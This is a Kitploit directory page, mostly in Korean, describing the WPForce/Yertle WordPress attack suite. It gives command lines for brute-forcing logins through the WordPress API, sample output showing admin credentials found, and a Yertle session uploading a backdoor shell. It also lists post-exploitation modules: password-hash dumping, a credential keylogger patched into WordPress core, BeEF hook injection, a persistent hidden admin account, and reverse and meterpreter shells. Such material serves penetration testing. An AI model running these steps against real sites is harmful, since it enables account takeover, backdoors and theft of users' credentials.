Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
WPForce — Wordpress Attack Suite | Kitploit
도구/GitHubGitHub/n00py/wpforce
Password AttacksPayload GenerationWeb Application ExploitationPost-ExploitationPenetration Testing
GitHubn00py/wpforce

WPForce

Wordpress Attack Suite

저장소 보기
979223195년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

Supported Python versions

WPForce - Wordpress 공격 스위트

소개:

WPForce는 Wordpress 공격 도구 모음입니다. 현재 이 모음에는 2개의 스크립트가 포함되어 있습니다 - API를 통해 로그인을 무차별 대입 공격하는 WPForce와, 관리자 자격 증명이 발견되면 셸을 업로드하는 Yertle입니다. Yertle에는 또한 다수의 사후 침투(post exploitation) 모듈이 포함되어 있습니다.

자세한 내용은 블로그 게시물을 참조하세요: https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/

다른 언어로 된 블로그:

중국어 - www.mottoin.com/100381.html

포르투갈어 - http://www.100security.com.br/wpforce/

스페인어 - http://www.1024megas.com/2017/05/wpforce-fuerzabruta-postexplotacion.html

https://esgeeks.com/como-hackear-sitio-wordpress-con-wpforce/

러시아어 - https://hackware.ru/?p=2547

프랑스어 - https://securityhack3r.info/wpforce-brute-force-attack-tool-wordpress/

터키어 - http://turkhackteam.org/web-server-guvenligi/1655005-wordpress-site-sizma-testi-part-1-a.html

기능:

  • 로그인 폼이 아닌 API를 통한 무차별 대입 공격으로 일부 보호 기능을 우회합니다
  • 대화형 셸을 자동으로 업로드할 수 있습니다
  • 완전한 기능의 리버스 셸을 생성하는 데 사용할 수 있습니다
  • WordPress 비밀번호 해시를 덤프합니다
  • 평문 비밀번호 수집을 위해 인증 함수를 백도어할 수 있습니다
  • 모든 페이지에 BeEF 훅을 주입합니다
  • 필요 시 meterpreter로 피벗할 수 있습니다

설치:

Yertle requires the requests libary to run.
http://docs.python-requests.org/en/master/user/install/

사용법:

python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"

   ,-~~-.___.       __        __ ____   _____
  / |  x     \      \ \      / /|  _ \ |  ___|___   _ __  ___  ___
 (  )        0       \ \ /\ / / | |_) || |_  / _ \ | '__|/ __|/ _ \.
  \_/-, ,----'  ____  \ V  V /  |  __/ |  _|| (_) || |  | (__|  __/
     ====      ||   \_ \_/\_/   |_|    |_|   \___/|_|   \___|\___|
    /  \-'~;   ||     |
   /  __/~| ...||__/|-"   Brute Force Attack Tool for Wordpress
 =(  _____||________|                 ~n00py~

Username List: usr.txt (3)
Password List: pass.txt (21)
URL: http://www[website].com
--------------------------
[[email protected] : xxxxxxxxxxxxx] are valid credentials!  - THIS ACCOUNT IS ADMIN
--------------------------
--------------------------
[[email protected] : xxxxxxxxxxxx] are valid credentials!
--------------------------
 100% Percent Complete
All correct pairs:
{'[email protected]': 'xxxxxxxxxxxxx', '[email protected]': 'xxxxxxxxxxxxx'}

 -h, --help            show this help message and exit
  -i INPUT, --input INPUT
                        Input file name
  -w WORDLIST, --wordlist WORDLIST
                        Wordlist file name
  -u URL, --url URL     URL of target
  -v, --verbose         Verbose output. Show the attemps as they happen.
  -t THREADS, --threads THREADS
                        Determines the number of threads to be used, default
                        is 10
  -a AGENT, --agent AGENT
                        Determines the user-agent
  -d, --debug           This option is used for determining issues with the
                        script.


python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i
     _..---.--.    __   __        _   _
   .'\ __|/O.__)   \ \ / /__ _ __| |_| | ___
  /__.' _/ .-'_\    \ V / _ \ '__| __| |/ _ \.
 (____.'.-_\____)    | |  __/ |  | |_| |  __/
  (_/ _)__(_ \_)\_   |_|\___|_|   \__|_|\___|
   (_..)--(.._)'--'         ~n00py~
      Post-exploitation Module for Wordpress

Backdoor uploaded!
Upload Directory: ebwhbas
os-shell>



  -h, --help            show this help message and exit
  -i, --interactive     Interactive command shell
  -r, --reverse         Reverse Shell
  -t TARGET, --target TARGET
                        URL of target
  -u USERNAME, --username USERNAME
                        Admin username
  -p PASSWORD, --password PASSWORD
                        Admin password
  -li IP, --ip IP       Listener IP
  -lp PORT, --port PORT
                        Listener Port
  -v, --verbose         Verbose output.
  -e EXISTING, --existing EXISTING
                        Skips uploading a shell, and connects to existing
                        shell


Yertle에는 현재 다음 모듈이 포함되어 있습니다:

Core Commands
=============
 
Command                   Description
-------                   -----------
?                         Help menu
beef                      Injects a BeEF hook into website
dbcreds                   Prints the database credentials
exit                      Terminate the session
hashdump                  Dumps all WordPress password hashes
help                      Help menu
keylogger                 Patches WordPress core to log plaintext credentials
keylog                    Displays keylog file
meterpreter               Executes a PHP meterpreter stager to connect to metasploit
persist                   Creates an admin account that will re-add itself
quit                      Terminate the session
shell                     Sends a TCP reverse shell to a netcat listener
stealth                   Hides Yertle from the plugins page
도구 다운로드